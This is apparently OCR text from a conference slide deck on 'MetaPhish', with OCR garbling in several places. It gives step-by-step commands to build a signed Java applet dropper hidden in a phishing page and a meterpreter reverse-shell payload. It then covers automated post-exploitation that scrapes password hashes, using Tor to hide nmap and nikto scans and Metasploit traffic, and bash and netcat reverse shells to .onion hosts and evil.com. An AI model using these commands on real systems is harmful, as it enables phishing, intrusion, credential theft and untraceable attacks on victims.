- javac MetaPhish.java 

Generate a class file: 

- jar -cf MetaPhish.jar MetaPhish. class 



Build a ketystore and set the passwords / organization name: 

- keytool -genkey -alias signFiles -keystore msfkeystore -storepass msfstorepass -dname "cn= 
Targets Org" -keypass msfkeypass 



The 



Sign the files and create a "secured" jar: 

- jarsigner -keystore msfkeystore -storepass msfstorepass -keypass msfkeypass -signedjar 
sMetaPhish.jar MetaPhish.jar signFiles 

Create the certificate: 

- keytool -export -keystore msfkeystore -storepass msfstorepass -alias signFiles -file 
MetaPhishLLC.cer 



Import the certificate: 

- keytool -import -alias company -file MetaPhishLLC.cer -keystore msfkeystore -storepass 
msfstorepass 
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Web Phishing - Dropper/Exec 

• You will now have a collection of files: 

- MetaPhish.class * Compiled Java 

- MetaPhish.jar * Compressed class 

- MetaPhish.java * Source code 

- MetaPhishLLC.cer * Certificate 

- msfkeystore * Key store 

- sMetaPhish.jar * Signed Jar 

- windex.html * malicious web page 
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Web Phishing - Dropper/Exec 

• Web code to execute the applet: 

<html> 

<body> 

<APPLET code="MetaPhish.class" 
archive="sMetaPhish.jar" width="1 " 
height="1"x/APPLET> 

</body> 

</html> 

• Put this in an FRAME with valid web site 
to tr i ck th e targ e t 
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Web Phishing - Dropper/Exec 



File Edit View History Bookmarks lools Help 



JO! ▼ C lBj I J |http://192.168.0.34/metaphish/win/windex.html 



The application's digital signature cannot be verified. 
Do you want to run the application? 



Name: MetaPhish 

Publisher: The Targets Org 

From: http://192. 168,0,34 

|~ Always trust content from this publisher.; 



w 



n The digital signature cannot be Menh.;d b b >i usfed source, '-'nlv ,, , c 

"■ ■-• ir- you trust the origin or the application. 



• Victim receives message 
box 

• Digital Signature will 
appear to have the 
"trusted" information 

• Many users will run this 

• Basically Social 
Engineering / Targeted 
Phishing 
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Automation 
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MSF Multi-Handler / Automation 

Need to be able to handle n incoming 
sessions 

Need to be able to automate functions 

- Acquire passwords 

- Add users 

- Upload 2 nd stage persistence backdoor 

- Registry / stored info 

Need to use firewall allowed egress ports 
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MSF Multi-Handler / Automation 



Create a stand alone meterpreter binary for 
windows: 

- Use the reverse connection assuming there is a 
firewall 

- Set your IP, should be directly internet accessible 

- Set the port to receive incoming sessions, directly 
internet accessible 

- Set the output name of the executable, for covertness 
set something targeted 

• . /msfpayload windows/meterpreter/reverse_tcp 
LH0ST=192. 168. 0.34 LP0RT=8000 R | 
./msfencode -b ' ' -t exe -o meterpreter.exe 
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MSF Multi-Handler / Automation 

Run metasploit ./msfconsole 

Set MSF parameters to match the meterp 

- msf > use exploit/multi/handler 

- msf exploit (handler) > set 
ExitOnSession false 

-msf exploit (handler) > set PAYLOAD 
windows/meterpreter/reverse_tcp 

-msf exploit (handler) > set LHOST 
192.168.0.34 

-msf exploit (handler) > set LPORT 8000 
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MSF Multi-Handler / Automation 

Setup automation script and set MSF in 
multihandling mode 

- msf exploit (handler) > set 
AutoRunScript ./PhishScrape. rb 

-msf exploit (handler) > exploit -j 

You can use any script you want, we are 
providing an example 
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MSF Multi-Handler / Automation 



• Deploy the meterpreter to your target using 
whatever means 

- Infected PDF /files 

- Malicious website 

• Exploit 

• Java Applet ~ *~-~ 

- Exploits 

- Email it directly 
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MSF Multi-Handler / Automation 



Watch for: 

- [*] Transmitting intermediate stager 
for over-sized stage... (191 bytes) 

You have successfully compromised a 
target! 

- Many targets may come in at once 

- To list your sessions do: 

• sessions -I 

• Then you can use standard meterpreter 
commands 



Slide: 69 



»** 



MSF Multi-Handler / Automation 

1 An automated scrapper will run on 
each target 

1 Will gather info automatically and 
place it in ~/.msf3/logs/scraper 

1 Each compromised target will 
generate a dir 
- ipaddress_data_timestamp 
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MSF Multi-Handler / Automation 



The following information will be autoscraped: 



env.txt # System environment 
group.txt # Domain group info 
hashes.txt # Crackable password hashes 
localgroup.txt # local group memberships 

nethood.txt # network neighborhood info 

network.txt # detail networking info of target 

services.txt # running services (look for AV) 

shares.txt # Any shared directories 
system.txt # operating system info 
users.txt # local user account names 



Take a look at DarkOperator's scripts for more ideas: 
http://www.darkoperator.com/ 
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Metaphish 



Demo 
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Who do you want to be today? 




Abusing Tor 
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Button, button, who's got the button 

• When using tor, normally the exit node is random 

• It is possible to define an exit node, or group of exit 
nodes 

• Nice for viewing content that is blocked by country 

• Way to cover tracks 

• Easy to hide in the evil that is tor 

• Avoid using an exit node in the target country when 
possible 

- Target country can collect node for forensics 
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Where am I again? 

• Theoretically you can just specify a country 
code in the tor_rc file. 

• Never seen it work correctly 

• Documented not to work in many news groups 

• Nice to pop out of just one or two nodes if 
running scans and such 

• Easy to change, can even have many configs 
with different exit nodes, and periodically 
change 
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Who's who 

• Vidalia is an easy way to manage tor, here 
we are looking at potential tor exit nodes 
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Who's who 

• Selecting Nodes Through Vidalia 

• When selecting exit nodes, it is important to 
make sure they have somewhat unique names 

- Unnamed is a common node name, it should be 
avoided 

• Now create a new file that will be the tor config 

- Add the following lines 

ExitNodes list,of,nodes 
StrictExitNodes 1 
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Who f s who 

• There are also webpages that will provide tor nodes 

• https://torstatus.blutmagie.de/ 

• Here it is possible to click on a node, and retrieve a 
finger print 

- Add a dollar to the front, and get rid of the spaces. Then these 
can be used as tor exit nodes 

• Unnamed: 46D0 5072 0DE9 D59E 6C22 D970 453B E287 C03F 
CE9B -> $46D050720DE9D59E6C22D970453BE287C03FCE9B 

- All these nodes may not be active at any given time, so grab a 
lot 

- Now unnamed will work great, names do not matter 
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https://torstatus.blutmagie.de/ 



Tor Network Status -- Router Detail 




General Information 


Router Name: 


Unnamed 


Fingerprint: 




Contact: 


None Given 


IP Address: 


218.16.120.12 


Hostname: 


Unavailable 


Onion Router Port: 


443 


Directory Server Port: 


9030 


Country Code: 


CN 


Platform / Version: 


Tor 0.1.2.19 on Windows Server 2003 Service Pack 2 [server] {enterprise} {terminal services, single user} {terminal services} 


Last Descriptor Published (GMT): 


2009-05-24 06:03:43 


Current Uptime: 


29 Day(s), 11 Hour(s), 48 Minute(s), 10 Second(s) 


Bandwidth (Max/Burst/Observed - In Bps): 


3145728/6291456/848912 


Family: 


No Info Given 
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Who's who 

• In Vidalia, you must point at the new config 
file 

• Stop TOR 

• Open settings 

- Advanced 

- And point to the new config file 
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What do I have? 

• Privoxy 

• HTTP Proxy on port 81 1 8 (by default) 

• Cleans/denies pages that may unintentionally reveal 
private IP when viewed in browser 

• Commonly configured to talk to tor's socks proxy 

• TOR 

• Full socks 5 proxy on port 9050 

• Vidalia 

• Gui interface to control tor 
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It'll fit 



• As it turns out, with a bit of creative patchwork, just 
about any TCP connection can go over tor 

• There are a couple major programs in Linux that can really 
make TOR useful 

- Proxychains - torsocks 

- Tsocks 

• These programs are designed to hook the socket calls of a 
program, and send them over the proxy 

• When using these, always use IP, DNS can potentially leak 

• Never run as root, root has higher privilege 

• If one fails, try the other 
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I want to proxy 



Setting up proxychains 

• In /etc/proxychains.conf 

- Comment out random_chain, chainjen, and example proxies 

- Uncomment or add dynamic_chain 

- At the bottom add a socks 5 proxy for TOR 

• socks5 127.0.0.1 9050 

- Depending on path and target, the following values will need 
to be messed with 

• tcp_read_time_out 

• tcp_connect_time_out 

• The bigger these are the more likely they will get the right port, 
but they may run into other problems, like slow scans, or more 
false positive scans 
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I want to proxy 

• Setting up tsocks 

• In /etc/tsocks make sure the following lines are 
correct 

- Server = 127.0.0.1 # TOR host, usually local 

- server_type = 5 # Socks4/5, usually 5 

- server_port = 9050 # tor port, default 9050 
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I want to proxy 



Torsocks 

- Basically set up for you when built from 
source 

- TOR friendly replacement for tsocks 
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Lets give v r a go 

• Lets try nmap over tor 

• Timeouts become problematic 

• Different exit nodes have different policies, and may 
stop parts of the scan 

• The results are less than accurate, but provide a good 
place to start 

• Requires a lot of time, and a lot of tweaking, but better 
than flying to another country (sometimes) 

• Do not run UDP, name lookup, ping, or any scans 
requiring root 
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Lets give'r a go 



user@user-laptop:~/tor_rc$ proxychains nmap -n -PN -p 80,22,443 192.1.167.74 

Starting Nmap 4.76 ( http://nmap.org ) at 2009-05-25 09:41 MDT 
ProxyChains-2.1 (http://proxychains.sf.net) 

dynamic chain:....1 27.0.0.1 :9050.... access denied to. .192.1. 167. 74:443 
dynamic chain:....1 27.0.0.1 :9050.... access denied to. .192.1. 167. 74:443 



user@user-laptop:~/tor_rc$ proxychains nmap -n -A -PN -p 80,22 192.1.167.74 

Starting Nmap 4.76 ( http://nmap.org ) at 2009-05-25 09:42 MDT 
ProxyChains-2.1 (http://proxychains.sf.net) 
dynamic chain:. ...127.0.0. 1:9050.. ..192.1. 167.74:22.. OK 
dynamic chain:. ...127.0.0. 1:9050.. ..192.1. 167.74:80.. OK 
dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:22..0K 
dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

PORT STATE SERVICE VERSION 

22/tcpopen ssh OpenSSH 4. 7p1 Debian 8ubuntu1. 2 (protocol 2.0) 

80/tcp open http Apache httpd 

Service Info: OS: Linux 
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Lets give'r a go 
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Lets get a bit deeper 

• Here will run Nikto over tor. 

• Nikto has a proxy option 

- This is a full HTTP proxy, not socks 

- This can be used with Privoxy 

- Privoxy will end up messing with results, making it 
less than useful 

• Instead running Nikto over tsocks works much 
better 
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Lets get a bit deeper 



user@user-laptop:~/$ proxychains nikto -host blog.attackresearch.com 192.1.167.74 
- Nikto V2.03/2.04 



ProxyChains-2.1 (http://proxychains.sf.net) 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

+ Target IP: 192.1.167.74 

+ Target Hostname: blog.attackresearch.com 

+ Target Port: 80 

+ Start Time: 2009-05-26 10:12:46 

+ Server: Apache 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

- /robots.txt - contains 40 'disallow' entries which should be manually viewed. (GET) 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.2.4-2ubuntu5.4 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

+ OSVDB-0: ETag header found on server, inode: 131801, size: 1820, mtime: 0x462ed49df8840 

+ 3577 items checked: 32 item(s) reported on remote host 
+ End Time: 2009-05-26 1 5:07:00 (1 7654 seconds) 



+ 1 host(s) tested 

Test Options: -host blog.attackresearch.com 192.1.167.74 
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What the heck, 111 eat the whole cow 

• Lets say there is a VPN at a remote site. It is a 
TCP based VPN like PPTP 

• With some creative combinations of port redirection, 
and tsock/proxychains we can VPN over TOR 

- This will not be very reliable 

- Timeout can kill the connection 

• Using tcpxd on one host we can setup 

- tsocks tcpxd 1723 ip.of. target 1723 

- Now have a second machine PPTP into the first 
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Metasploit and TOR 

A couple of possibilities 

- Use Torsocks 

- Easier to do it in metssploit 

• setg Proxies SOCKS4:localhost:<torport> 

- Both methods are restricted to Connect 
Shells 

- Both are restricted to TCP 

- Always try and use IP to avoid 
unintended leakage 
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Demo 




-;^, 
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Can they call me anonymously? 

• Sure, TOR uses .onion domains in order to 
talk to anonymous servers on the TOR 
network 

• Normally requires TOR on both sides 

• Can we shell to a .onion? 

- Sure, through tsocks, privoxy, or even wget 

• Can you tell what country a .onion is in? 

- Currently no, there have been problems found in 
TOR in the past, but they are fairly quick to patch 
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Shelling Bash Over TOR 

TOR is installed on target with torsocks 

- Simplest case, a netcat listener, and using 
built in bash commands 

-Setting up the server 

• In the torrc file, add the following lines 

- HiddenServiceDir /my/service/dir/ 

- HiddenServicePort <portfortor> 127.0.0.1 :<listenport> 

• Now star netcat on <listenport> 

nc -I -p <listenport> 
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Shelling Bash Over TOR 

Now on the target 
- With Netcat 

torsocks nc -e /bin/bash <hostname.onion> 
<torport> 

<hostname.onion> is in the servers service dir 

in a file called hostname 

- Without Netcat 

torsocks /bin/bash 

exec 5<>/dev/tcp/evil. com/8080 

cat <&5 | while read line; do $line 2>&5 >&5; done 
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Do I have to install TOR on the target? 



Turns out no. 

• There are web proxy's that give access into the TOR 
network 

www.tor-proxy.net Is one of many sites that lets a user 
bounce through them and then into TOR. 

• Keep in mind, unfortunately they see all traffic, they won't know 
where the server is though 

• http://tor-proxy.net/proxy/tor/browse. php?u=http%3A%2F 
%2Fslashdot.org%2F&b=1 4 

- We have created Proof-of-Concept shells using this method 

- Basically a modified HTTP/HTTPS Shell 
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The tor-proxy.net Backdoor 



Benefits 

- No need for to on the client 

- Can't tell who the server belongs to 

- Can do https 

Downfalls 

- tor-proxy.net can read all the traffic 

- Asynchronous, it can take a bit before 
command output 

- Not interactive 
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DEMO 
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To Do (working on it©) 

Metasploit module that automatically 
generates the web apps / web server 

- Autogen's the applet & meterpreter 

- Integrate with PDF infector module 

- Integrate post-exploit automation scripts 

- Integrate with browser autopwn 

2 nd stage HTTP Backdoor 
More integration with TOR 
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PhishTunnel 



Demo everything over TOR 

- TOR backdoor communications 

- Metasploit over TOR 

- Metaphish concepts over TOR 
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Rezen 

Cg 

Snowchyld 

Ed Skoudis 

llso 

Dragorn 

Knicklighter 
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Thanks! 




HD Moore 
Dean De Beers 
Delchi 
egypt 
tebo 

carnalOwnage 
Anyone we forgot 
famousjs 



Check out autopwn, egypt & Efrain Torres talks for 
awesome web pOwnage concepts and tools 
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